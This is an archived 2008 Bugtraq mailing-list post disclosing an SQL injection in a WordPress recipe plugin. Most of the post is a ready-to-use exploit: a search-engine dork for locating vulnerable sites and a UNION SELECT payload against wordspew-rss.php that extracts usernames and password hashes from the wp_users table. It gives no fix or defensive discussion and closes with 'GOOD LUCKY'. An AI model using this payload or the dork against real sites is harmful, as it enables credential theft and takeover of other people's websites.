Bugtraq mailing list archives

Wordpress Plugin (wp-content/recipe) SQL Injection

From: hackturkiye.hackturkiye () gmail com
Date: 16 Feb 2008 16:50:56 -0000

#########################################################################
#  
# Wordpress Plugin (wp-content/recipe) SQL Injection
#  
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com/ 

#########################################################################
#
#  DORK 1 : allinurl:  "wp-content/recipe"
# 
#########################################################################
  EXPLOIT : 

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

#########################################################################
# S@BUN           GOOD LUCKY          S@BUN 
#########################################################################

Current thread:

Wordpress Plugin (wp-content/recipe) SQL Injection hackturkiye . hackturkiye (Feb 18)